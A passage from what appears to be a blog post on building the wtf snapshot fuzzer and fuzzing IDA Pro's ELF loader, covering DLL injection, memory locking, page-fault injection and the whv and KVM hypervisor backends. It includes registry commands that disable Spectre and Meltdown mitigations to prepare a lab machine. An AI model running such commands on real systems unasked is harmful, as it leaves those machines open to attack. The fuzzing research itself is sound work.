    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe
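
For what it's worth, the below is only a guess at the kind of approach such a tool could take, not lockmem's actual implementation: bump the working set quota, then walk the committed regions and lock them. NtLockVirtualMemory is undocumented and its prototype is declared here from public research; the working set sizes are arbitrary values for the sketch.

#include <windows.h>
#include <winternl.h>
#include <cstdint>
#include <cstdio>

// Undocumented; a MapType of 1 locks the pages into the process working set.
typedef NTSTATUS(NTAPI *NtLockVirtualMemory_t)(HANDLE ProcessHandle,
                                               PVOID *BaseAddress,
                                               PSIZE_T NumberOfBytesToLock,
                                               ULONG MapType);

bool LockEverything(const HANDLE Process) {
  // Give the process a working set large enough to hold the locked pages
  // (values picked arbitrarily for the sketch).
  SetProcessWorkingSetSize(Process, SIZE_T(1) << 30, SIZE_T(2) << 30);

  const auto NtLockVirtualMemory = (NtLockVirtualMemory_t)GetProcAddress(
      GetModuleHandleA("ntdll"), "NtLockVirtualMemory");

  // Walk every committed region of the target and lock it.
  MEMORY_BASIC_INFORMATION Mbi = {};
  for (uint8_t *Address = nullptr;
       VirtualQueryEx(Process, Address, &Mbi, sizeof(Mbi)) == sizeof(Mbi);
       Address = (uint8_t *)Mbi.BaseAddress + Mbi.RegionSize) {
    if (Mbi.State != MEM_COMMIT) {
      continue;
    }

    PVOID Base = Mbi.BaseAddress;
    SIZE_T Size = Mbi.RegionSize;
    const NTSTATUS Status = NtLockVirtualMemory(Process, &Base, &Size, 1);
    if (Status != 0) {
      printf("Failed to lock %p (0x%08lx)\n", Mbi.BaseAddress,
             (unsigned long)Status);
    }
  }

  return true;
}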

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as the virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call, let's say, fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained by the fact that memory is lazy on Windows: the page fault handler is expected to be invoked, fix the PTE itself, and let execution carry on. Because we are doing the memory write ourselves, we don't generate a page fault and so the page fault handler doesn't get invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the below invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

vtune

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults as actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though, such as filling the address space with int3s and lazily populating code, leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints, which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that, which was perfect.
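As a rough sketch of how the API can be used (assuming guest RAM starts at GPA 0 and the usual Partition_ / RamSize_ members; this is not wtf's exact code), you query a bitmap in which every set bit flags a 4KiB guest physical page that has been written to:

//
// Sketch: walk the dirty bitmap returned by whv; each set bit marks a dirty
// 4KiB guest physical page.
//

bool WhvBackend_t::ForEachDirtyGpa(
    const std::function<void(const Gpa_t)> &Callback) {
  const uint64_t NumberPages = RamSize_ / Page::Size;
  std::vector<uint64_t> Bitmap((NumberPages + 63) / 64);

  if (FAILED(WHvQueryGpaRangeDirtyBitmap(
          Partition_, 0, RamSize_, Bitmap.data(),
          uint32_t(Bitmap.size() * sizeof(uint64_t))))) {
    return false;
  }

  for (uint64_t PageIdx = 0; PageIdx < NumberPages; PageIdx++) {
    const bool Dirty = (Bitmap[PageIdx / 64] >> (PageIdx % 64)) & 1;
    if (Dirty) {
      Callback(Gpa_t(PageIdx * Page::Size));
    }
  }

  return true;
}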

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag, but if you turn on the trap flag before, say, a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR, stripping away the trap flag. After programming IA32_FMASK myself, I could trace through syscalls, which was great. By comparing traces generated by the two backends, I then noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens, the CPU saves the current context and loads a new one from the task segment, which doesn't have the trap flag set. I can't remember if I got that working or if it turned out to be harder than it looked, but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is not as good as what bochscpu offered because it is far less precise, but it was the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};
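The cancellation itself presumably boils down to a single whv call; something along these lines (a sketch assuming a Partition_ handle and virtual processor index 0, not wtf's exact code):

//
// Sketch: kick the virtual processor out of WHvRunVirtualProcessor so that
// the run loop can flag the test case as a timeout.
//

void WhvBackend_t::CancelRunVirtualProcessor() {
  if (FAILED(WHvCancelRunVirtualProcessor(Partition_, 0, 0))) {
    fmt::print("WHvCancelRunVirtualProcessor failed.\n");
  }
}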

Inserting page faults

To be able to insert a page fault into the guest, I use the WHvRegisterPendingEvent register and the WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature I wanted was to get as much determinism as I could. After tracing a bunch of executions, I realized that nt!ExGenRandom uses rdrand in the Windows kernel and that this was a big source of non-determinism across executions. Intel does support generating a vmexit when the instruction is executed, but this is not exposed by whv either.

I settled for placing a breakpoint right after the rdrand instruction and emulating its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where the non-determinism is coming from, which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues, but it might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end, which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that the code coverage breakpoints I thought were free were not quite that free. In theory, they are one-time breakpoints, so you pay their cost only once. This leads to a warm-up cost at the start of the run, while the fuzzer discovers the highly reachable sections of code, but over time the cost should amortize to practically nothing.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that hadn't been hit yet in a list. When restoring, I would first restore every dirty page and then iterate through this list to reset the code-coverage breakpoints. It turns out this is highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets the breakpoint both in this copy and in the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty pages and ask the Ram_t class to restore the content of each page. Internally, the class checks if the page has been duplicated and, if so, restores it from this copy. If it doesn't have a copy, it restores the content from the dump file. This lets us restore code coverage breakpoints at the cost of some extra memory:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}
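Putting the pieces together, restoring the guest memory between two test cases is conceptually just a loop over the dirty pages that defers to Ram_t (a sketch reusing the hypothetical ForEachDirtyGpa helper shown earlier, not wtf's exact code):

//
// Sketch: walk the dirty pages and let Ram_t decide whether to restore them
// from the breakpoint-instrumented copy or from the crash-dump.
//

bool WhvBackend_t::RestoreDirtyMemory() {
  return ForEachDirtyGpa([&](const Gpa_t DirtyGpa) { Ram_.Restore(DirtyGpa); });
}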

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique, but I encountered a pretty annoying bug where IDA was tagging switch tables as code instead of data. This led to wtf corrupting switch tables with cc's and to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet, which is nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read/execute in the EPT and tracking dirtiness myself when receiving a memory access fault caused by a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once that was fixed, I noticed that WHvTranslateGva was also slower than I expected, which is why I emulated its behavior as well by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance than bochscpu. I was honestly a bit disappointed, as I expected more of a 100x increase, but it was still a significant improvement:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes, which was exciting even though they were just interrs.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't widespread or cheap. On top of that, I was still disappointed by the performance of whv, so I was eager to see how battle-tested hypervisors like Xen or KVM would measure up.

I didn't know anything about those VMMs, but I quickly discovered that KVM is part of the Linux kernel and that it exposes a user-mode API via /dev/kvm that resembles whv's. This looked perfect because, if it was similar enough to whv, I could probably write a backend for it easily. The KVM API also powers Firecracker, a project that creates micro VMs to run various workloads in the cloud, so I assumed it would offer rich features as well as good performance to be the foundation of such a project.

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an ioctl every time you want the value of a guest GPR, KVM allows you to map a memory region shared with the kernel in which the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
